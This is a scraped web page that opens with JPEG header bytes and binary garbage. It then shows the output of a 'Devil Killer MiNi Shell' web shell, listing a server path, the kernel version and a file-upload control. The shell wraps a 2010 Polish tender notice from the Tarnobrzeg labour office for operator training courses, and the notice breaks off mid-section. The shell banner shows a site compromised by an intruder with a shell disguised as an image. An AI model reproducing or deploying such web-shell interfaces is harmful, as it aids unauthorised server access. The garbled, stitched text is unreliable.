JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100422/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100422/92685-N-2010.html

<p class="kh_header"><b>Tarnobrzeg: Usługa organizacji szkolenia dla osób bezrobotnych w zakresie: Zadanie 1 - Operator koparko-ładowarek kl. III, Zadanie 2 - Operator ładowarek jednonaczyniowych kl. III, Zadanie 3 - Kierowca wózków jezdniowych z napędem silnikowym</b><br>
<b>Numer ogłoszenia: 92685 - 2010; data zamieszczenia: 22.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Tarnobrzegu , ul. 1 Maja 4, 39-400 Tarnobrzeg, woj. podkarpackie, tel. 015 8230030, faks 015 8230166.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa organizacji szkolenia dla osób bezrobotnych w zakresie: Zadanie 1 - Operator koparko-ładowarek kl. III, Zadanie 2 - Operator ładowarek jednonaczyniowych kl. III, Zadanie 3 - Kierowca wózków jezdniowych z napędem silnikowym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1. Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie  szkolenia dla 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Tarnobrzegu szkolenia w zakresie Operator koparko-ładowarek kl. III. Szkolenie realizowane będzie w ramach projektu pn. Więcej szans w powiecie tarnobrzeskim współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki Poddziałanie 6.1.3.Uczestnikami szkolenia będą osoby nie posiadające stażu pracy przy obsłudze techniczno-eksploatacyjnej powyższych maszyn, posiadające zaświadczenie lekarskie o braku przeciwwskazań zdrowotnych do wykonywania pracy na stanowisku operatora ww maszyn. a) Cel szkolenia: teoretyczne i praktyczne przygotowanie uczestników do przystąpienia do egzaminu i uzyskania uprawnień państwowych w zakresie obsługi maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. z 2001 r., Nr 118 poz. 1263) zgodnie z kierunkiem odbytego szkolenia. Szkolenie ma  zakończyć się  egzaminem państwowym  ( egzamin w ostatnim dniu odbywania się zajęć edukacyjnych).W trakcie szkolenia uczestnicy winni nabyć umiejętności z zakresu: użytkowania eksploatacyjnego, dokumentacji technicznej, bezpieczeństwa i higieny pracy, podstaw elektrotechniki, silników spalinowych, elementów hydrauliki, budowy koparko - ładowarek, technologii robót koparko - ładowarek, praktycznej obsługi koparko - ładowarek. Program szkolenia powinien być zgodny z programem Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego oraz zgodny z  Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. z 2001 r. Nr 118 poz. 1263) oraz obejmować dodatkowe godziny zajęć praktycznych za brak praktyki zawodowej. Program szkolenia winien obejmować 202 godziny zajęć. b) Szkolenie powinno być realizowane przez podmiot posiadający:- warunki lokalowe do prowadzenia wykładów,- park maszynowy wraz z placem manewrowym,- kadrę wykładowców,- warunki socjalne i wyposażenie dydaktyczne, o których mowa w § 25  Rozporządzenia Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. z 2001r. Nr 118 poz. 1263), których spełnienie zostało potwierdzone przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie. c) Instytucja szkoleniowa powinna posiadać aktualny wpis do Rejestru Instytucji Szkoleniowych WUP. d) Miejsce realizacji szkolenia:  miejscowość do której z Tarnobrzega jest dogodny dojazd, a łączny czas dojazdu na szkolenie w obie strony   nie przekracza 3 godzin. W ofercie należy wskazać dokładny adres realizacji zajęć teoretycznych i praktycznych. e) Szkolenie powinno odbywać się w formie kursu realizowanego według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu. Zajęcia szkoleniowe mogą odbywać się w godzinach od 800 do 1600 , w przypadkach szczególnie uzasadnionych do godz.1800.  Liczba godzin szkolenia nie może przekroczyć 8 godzin zegarowych dziennie. f) Zajęcia winny odbywać się w grupach, z tym że liczba osób w grupie powinna być dostosowana do warunków lokalowych oraz sprzętowych, aby umożliwić uczestnikom kursu korzystanie z przekazywanej wiedzy teoretycznej  i praktycznej w dostatecznym zakresie. W harmonogramie szkolenia należy wykazać przerwy w wymiarze uzasadnionym. g) Wykonawca powinien zapewnić każdemu uczestnikowi szkolenia niezbędne materiały szkoleniowe i dydaktyczne (zgodnie z aktualnym stanem prawnym), Wykonawca  zapewnia każdemu uczestnikowi  szkolenia: teczkę na materiały dydaktyczne, długopis, co najmniej 60-kartkowy zeszyt bądź notatnik, oraz materiały dydaktyczne  niezbędne do utrwalenia wiadomości w celu pozytywnego zdania egzaminu, mogą to być np. podręczniki, kserokopie treści przekazywanych w trakcie zajęć szkoleniowych.  Materiały szkoleniowe opracowane przez Wykonawcę stanowić powinny rozwinięcie zagadnień objętych programem szkolenia, w sposób przystępny przedstawiać praktyczne informacje ułatwiające uczestnikom szkolenia przyswajanie wiedzy. Materiały szkoleniowe mogą stanowić również gotowe publikacje dostępne na rynku. Nie mogą zawierać zapożyczeń z prac osób trzecich oraz nie mogą naruszać praw przysługujących osobom trzecim, w szczególności praw autorskich tych osób. Wszystkie materiały muszą być przygotowane i rozdane uczestnikom szkolenia  w pierwszym dniu szkolenia. Po zakończeniu szkolenia materiały dydaktyczne przechodzą na własność każdego uczestnika szkolenia. h) W trakcie odbywania zajęć teoretycznych jak i praktycznych powinny być zapewnione właściwe, zgodne z obowiązującymi przepisami warunki bezpieczeństwa i higieny pracy. Na zajęciach praktycznych uczestnicy szkolenia powinni mieć do dyspozycji odpowiedni sprzęt spełniający wymogi bezpieczeństwa zgodnie z obowiązującymi w tym zakresie przepisami prawa. Ponadto Wykonawca na czas trwania kursu zobowiązuje się zapewnić uczestnikom szkolenia odpowiednie warunki lokalowe oraz socjalne do prawidłowego przebiegu szkolenia (tj. dostęp do toalety, dostęp do pomieszczenia socjalnego).i) W całkowitym koszcie szkolenia należy uwzględnić  koszt przeprowadzenia egzaminu państwowego oraz wszystkie pozycje zawarte w preliminarzu, w tym koszt materiałów dydaktycznych, które otrzymają uczestnicy na własność  ( np. skrypty, podręczniki, materiały piśmiennicze itp.) j) Po zakończeniu szkolenia i zdaniu egzaminu państwowego Wykonawca zobowiązany jest wydać uczestnikom szkolenia zaświadczenie o ukończeniu kursu świadectwo oraz książeczkę operatora maszyn zgodnie z kierunkiem odbytego szkolenia. Wydane  zaświadczenie o ukończeniu kursu powinno być opatrzone logiem Programu Operacyjnego Kapitał Ludzki oraz Unii Europejskiej  z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego. k) Zajęcia powinny być prowadzone przez imiennie wskazanych wykładowców i instruktorów o odpowiednich kwalifikacjach i doświadczeniu, spełniających wymogi przewidziane w odrębnych przepisach. l)  Wykonawca zobowiązany jest do umieszczenia  informacji o współfinansowaniu szkolenia ze środków Unii Europejskiej  w ramach EFS,  zgodnie z dokumentem Wytyczne dotyczące oznaczania projektów w ramach PO KL  (logo Programu Operacyjnego Kapitał Ludzki, logo Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego powinno zostać umieszczone na wszystkich dokumentach i materiałach szkoleniowych związanych z organizacją szkolenia, w tym również w miejscu realizacji szkolenia powinno być zastosowana  zasada wizualizacji). ł) Wykonawca zapewni nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia oraz dokona sprawdzenia efektów szkolenia. 
ZADANIE NR 2 - Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie  szkolenia dla 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Tarnobrzegu szkolenia w zakresie Operator ładowarek jednonaczyniowych kl. III. Szkolenie realizowane będzie w ramach projektu pn. Więcej szans w powiecie tarnobrzeskim współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki Poddziałanie 6.1.3.Uczestnikami szkolenia będą osoby nie posiadające stażu pracy przy obsłudze techniczno-eksploatacyjnej powyższych maszyn, posiadające zaświadczenie lekarskie o braku przeciwwskazań zdrowotnych do wykonywania pracy na stanowisku operatora ww maszyn. a) Cel szkolenia: teoretyczne i praktyczne przygotowanie uczestników do przystąpienia do egzaminu i uzyskania uprawnień państwowych w zakresie obsługi maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. z 2001 r., Nr 118 poz. 1263) zgodnie z kierunkiem odbytego szkolenia. Szkolenie ma  zakończyć się  egzaminem państwowym     ( egzamin w ostatnim dniu odbywania się zajęć edukacyjnych).W trakcie szkolenia uczestnicy winni nabyć umiejętności z zakresu: użytkowania eksploatacyjnego, dokumentacji technicznej, bezpieczeństwa i higieny pracy, podstaw elektrotechniki, silników spalinowych, elementów hydrauliki, budowy ładowarek, technologii robót ładowarką jednonaczyniową, praktycznej obsługi ładowarek. Program szkolenia powinien być zgodny z programem Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego oraz zgodny z  Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. z 2001 r. Nr 118 poz. 1263) oraz obejmować dodatkowe godziny zajęć praktycznych za brak praktyki zawodowej. Program szkolenia winien obejmować 202 godziny zajęć. b) Szkolenie powinno być realizowane przez podmiot posiadający:- warunki lokalowe do prowadzenia wykładów,- park maszynowy wraz z placem manewrowym,- kadrę wykładowców,- warunki socjalne i wyposażenie dydaktyczne, o których mowa w § 25  Rozporządzenia Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. z 2001r. Nr 118 poz. 1263), których spełnienie zostało potwierdzone przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie. c) Instytucja szkoleniowa powinna posiadać aktualny wpis do Rejestru Instytucji Szkoleniowych WUP. d) Miejsce realizacji szkolenia:  miejscowość do której z Tarnobrzega jest dogodny dojazd, a łączny czas dojazdu na szkolenie w obie strony   nie przekracza 3 godzin. W ofercie należy wskazać dokładny adres realizacji zajęć teoretycznych i praktycznych. e) Szkolenie powinno odbywać się w formie kursu realizowanego według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu. Zajęcia szkoleniowe mogą odbywać się 
w godzinach od 800 do 1600 , w przypadkach szczególnie uzasadnionych do godz.1800.  Liczba godzin szkolenia nie może przekroczyć 8 godzin zegarowych dziennie. f) Zajęcia winny odbywać się w grupach, z tym że liczba osób w grupie powinna być dostosowana do warunków lokalowych oraz sprzętowych, aby umożliwić uczestnikom kursu korzystanie z przekazywanej wiedzy teoretycznej i praktycznej w dostatecznym zakresie. W harmonogramie szkolenia należy wykazać przerwy w wymiarze uzasadnionym. g) Wykonawca powinien zapewnić każdemu uczestnikowi szkolenia niezbędne materiały  szkoleniowe i dydaktyczne (zgodnie z aktualnym stanem prawnym), Wykonawca  zapewnia każdemu uczestnikowi  szkolenia: teczkę na materiały dydaktyczne, długopis, co najmniej 60-kartkowy zeszyt bądź notatnik, oraz materiały dydaktyczne  niezbędne do utrwalenia wiadomości w celu pozytywnego zdania egzaminu, mogą to być np. podręczniki, kserokopie treści przekazywanych w trakcie zajęć szkoleniowych.  Materiały szkoleniowe opracowane przez Wykonawcę stanowić powinny rozwinięcie zagadnień objętych programem szkolenia, w sposób przystępny przedstawiać praktyczne informacje ułatwiające uczestnikom szkolenia przyswajanie wiedzy. Materiały szkoleniowe mogą stanowić również gotowe publikacje dostępne na rynku. Nie mogą zawierać zapożyczeń z prac osób trzecich oraz nie mogą naruszać praw przysługujących osobom trzecim, w szczególności praw autorskich tych osób. Wszystkie materiały muszą być przygotowane i rozdane uczestnikom szkolenia  w pierwszym dniu szkolenia. Po zakończeniu szkolenia materiały dydaktyczne przechodzą na własność każdego uczestnika szkolenia. h) W trakcie odbywania zajęć teoretycznych jak i praktycznych powinny być zapewnione właściwe, zgodne z obowiązującymi przepisami warunki bezpieczeństwa i higieny pracy. Na zajęciach praktycznych uczestnicy szkolenia powinni mieć do dyspozycji odpowiedni sprzęt spełniający wymogi bezpieczeństwa zgodnie z obowiązującymi w tym zakresie przepisami prawa. Ponadto Wykonawca na czas trwania kursu zobowiązuje się zapewnić uczestnikom szkolenia odpowiednie warunki lokalowe oraz socjalne do prawidłowego przebiegu szkolenia (tj. dostęp do toalety, dostęp do pomieszczenia socjalnego).i) W całkowitym koszcie szkolenia należy uwzględnić  koszt przeprowadzenia egzaminu państwowego oraz wszystkie pozycje zawarte w preliminarzu, w tym koszt materiałów dydaktycznych, które otrzymają uczestnicy na własność  ( np. skrypty, podręczniki, materiały piśmiennicze itp). j) Po zakończeniu szkolenia i zdaniu egzaminu państwowego Wykonawca zobowiązany jest wydać uczestnikom szkolenia zaświadczenie o ukończeniu kursu świadectwo oraz książeczkę operatora maszyn zgodnie z kierunkiem odbytego szkolenia. Wydane  zaświadczenie o ukończeniu kursu powinno być opatrzone logiem Programu Operacyjnego Kapitał Ludzki oraz Unii Europejskiej  z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego. k) Zajęcia powinny być prowadzone przez imiennie wskazanych wykładowców i instruktorów o odpowiednich kwalifikacjach i doświadczeniu, spełniających wymogi przewidziane w odrębnych przepisach. l) Wykonawca zobowiązany jest do umieszczenia informacji o współfinansowaniu szkolenia ze środków Unii Europejskiej  w ramach EFS,  zgodnie z dokumentem Wytyczne dotyczące oznaczania projektów w ramach PO KL  (logo Programu Operacyjnego Kapitał Ludzki, logo Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego powinno zostać umieszczone na wszystkich dokumentach 
i materiałach szkoleniowych związanych z organizacją szkolenia, w tym również w miejscu realizacji szkolenia powinno być zastosowana  zasada wizualizacji). ł) Wykonawca zapewni nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia oraz dokona sprawdzenia efektów szkolenia. 
ZADANIE NR 3 Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie  szkolenia dla 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy 
w Tarnobrzegu z zakresu Kierowca wózków jezdniowych z napędem silnikowym. Szkolenie realizowane będzie w ramach projektu pn. Więcej szans w powiecie tarnobrzeskim współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki Poddziałanie 6.1.3.Uczestnikami szkolenia będą osoby nie posiadające stażu pracy przy obsłudze wózków jezdniowych, posiadające zaświadczenie lekarskie o braku przeciwwskazań zdrowotnych do wykonywania pracy na stanowisku kierowcy wózków jezdniowych. a)  Cel szkolenia: teoretyczne 
i praktyczne przygotowanie uczestników do samodzielnego obsługiwania wózków jezdniowych. Szkolenie ma zakończyć się egzaminem państwowym przez Urzędem Dozoru Technicznego ( egzamin w ostatnim dniu zajęć edukacyjnych).W trakcie szkolenia uczestnicy winni nabyć umiejętności z zakresu: rozróżniania wózków, ładunkoznawstwa, prawidłowej eksploatacji wózków jezdniowych, aktów prawnych dozoru technicznego, czynności jakie należy wykonać przed, w trakcie i po pracy z wózkami, bezpiecznej wymiany butli gazowych w wózkach wyposażonych w te urządzenia. Program szkolenia powinien obejmować 67 godzin zajęć i być zatwierdzony przez Ośrodek Doskonalenia Kadr w Mysłowicach nadzorowany przez ministra właściwego ds. gospodarki ( Dz.U. Nr 70 z dnia 10 maja 2002 oraz Dz.U. Nr 65 poz. 603). b) Szkolenie powinno być realizowane przez podmiot posiadający:- warunki lokalowe do prowadzenia wykładów,- park maszynowy wraz z placem manewrowym,- kadrę wykładowców,- warunki socjalne i wyposażenie niezbędne do prawidłowej realizacji szkolenia. c) Instytucja szkoleniowa powinna posiadać aktualny wpis do Rejestru Instytucji Szkoleniowych WUP. d) Miejsce realizacji szkolenia:  Tarnobrzeg lub miejscowość do której z Tarnobrzega jest dogodny dojazd, a łączny czas dojazdu na szkolenie w obie strony nie przekracza 2 godzin.W ofercie należy wskazać dokładny adres realizacji zajęć teoretycznych i praktycznych. e) Szkolenie powinno odbywać się w formie kursu realizowanego według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu. Zajęcia szkoleniowe mogą odbywać się w godzinach od 800 do 1600 , w przypadkach szczególnie uzasadnionych do godz.1800.  Liczba godzin szkolenia nie może przekroczyć 8 godzin zegarowych dziennie. f) Zajęcia winny odbywać się w grupach, z tym że liczba osób w grupie powinna być dostosowana do warunków lokalowych oraz sprzętowych, aby umożliwić uczestnikom kursu korzystanie z przekazywanej wiedzy teoretycznej i praktycznej w dostatecznym zakresie. W harmonogramie szkolenia należy wykazać przerwy w wymiarze uzasadnionym. g) Wykonawca powinien zapewnić każdemu uczestnikowi szkolenia niezbędne materiały szkoleniowe i dydaktyczne (zgodnie 
z aktualnym stanem prawnym), Wykonawca  zapewnia każdemu uczestnikowi  szkolenia: teczkę na materiały dydaktyczne, długopis, co najmniej 60-kartkowy zeszyt bądź notatnik, oraz materiały dydaktyczne  niezbędne do utrwalenia wiadomości w celu pozytywnego zdania egzaminu, mogą to być np. podręczniki, kserokopie treści przekazywanych w trakcie zajęć szkoleniowych.  Materiały szkoleniowe opracowane przez Wykonawcę stanowić powinny rozwinięcie zagadnień objętych programem szkolenia, w sposób przystępny przedstawiać praktyczne informacje ułatwiające uczestnikom szkolenia przyswajanie wiedzy. Materiały szkoleniowe mogą stanowić również gotowe publikacje dostępne na rynku. Nie mogą zawierać zapożyczeń z prac osób trzecich oraz nie mogą naruszać praw przysługujących osobom trzecim, w szczególności praw autorskich tych osób. Wszystkie materiały muszą być przygotowane i rozdane uczestnikom szkolenia  w pierwszym dniu szkolenia. Po zakończeniu szkolenia materiały dydaktyczne przechodzą na własność każdego uczestnika szkolenia. 
h) W trakcie odbywania zajęć teoretycznych jak i praktycznych powinny być zapewnione właściwe, zgodne z obowiązującymi przepisami warunki bezpieczeństwa i higieny pracy. Na zajęciach praktycznych uczestnicy szkolenia powinni mieć do dyspozycji odpowiedni sprzęt spełniający wymogi bezpieczeństwa zgodnie z obowiązującymi w tym zakresie przepisami prawa. Ponadto Wykonawca na czas trwania kursu zobowiązuje się zapewnić uczestnikom szkolenia odpowiednie warunki lokalowe oraz socjalne do prawidłowego przebiegu szkolenia (tj. dostęp do toalety, dostęp do pomieszczenia socjalnego).i) W całkowitym koszcie szkolenia należy uwzględnić  koszt przeprowadzenia egzaminu państwowego oraz wszystkie pozycje zawarte w preliminarzu, w tym koszt materiałów dydaktycznych, które otrzymają uczestnicy na własność  ( np. skrypty, podręczniki, materiały piśmiennicze itp.) j) Po zakończeniu szkolenia i zdaniu egzaminu państwowego Wykonawca  zobowiązany jest wydać uczestnikom szkolenia zaświadczenie o ukończeniu kursu oraz uprawnienia państwowe wystawione przez Urząd Dozoru Technicznego. Wydane  zaświadczenie o ukończeniu kursu powinno być opatrzone logiem Programu Operacyjnego Kapitał Ludzki oraz Unii Europejskiej  z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego. k) Zajęcia powinny być prowadzone przez imiennie wskazanych wykładowców i instruktorów o odpowiednich kwalifikacjach i doświadczeniu, spełniających wymogi przewidziane w odrębnych przepisach. l) Wykonawca zobowiązany jest do umieszczenia informacji o współfinansowaniu szkolenia ze środków Unii Europejskiej  w ramach EFS,  zgodnie z dokumentem Wytyczne dotyczące oznaczania projektów w ramach PO KL  (logo Programu Operacyjnego Kapitał Ludzki, logo Unii Europejskiej z odwołaniem słownym 
do Unii Europejskiej i Europejskiego Funduszu Społecznego powinno zostać umieszczone 
na wszystkich dokumentach i materiałach szkoleniowych związanych z organizacją szkolenia, w tym również w miejscu realizacji szkolenia powinno być zastosowana  zasada wizualizacji). ł) Wykonawca zapewni nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia oraz dokona sprawdzenia efektów szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania uprawnień do wykonywania określonej działalności lub czynności jeżeli przedłoży potwierdzoną za zgodność z oryginałem kserokopię:
a)zaświadczenia o wpisie  do rejestru instytucji szkoleniowych wydanego przez wojewódzki urząd pracy właściwy ze względu na adres siedziby instytucji szkoleniowej (art. 20 ustawy  o promocji zatrudnienia i instytucjach rynku pracy) wraz z oświadczeniem o aktualizacji wpisu na 2010 rok Zadanie nr 1, 2, 3 oraz:
b)dokumentu wydanego przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie potwierdzający spełnienie wymagań określonych w § 25  Rozporządzenia Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. z 2001r., Nr 118 poz. 1263) w przypadku Zadania nr 1 i 2 
c)	Zaświadczenie wydane przez Ośrodek Doskonalenia Kadr w Mysłowicach o zatwierdzeniu programu nauczania - Zadanie nr 3.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania wiedzy    i doświadczenia, jeżeli wykaże, że:
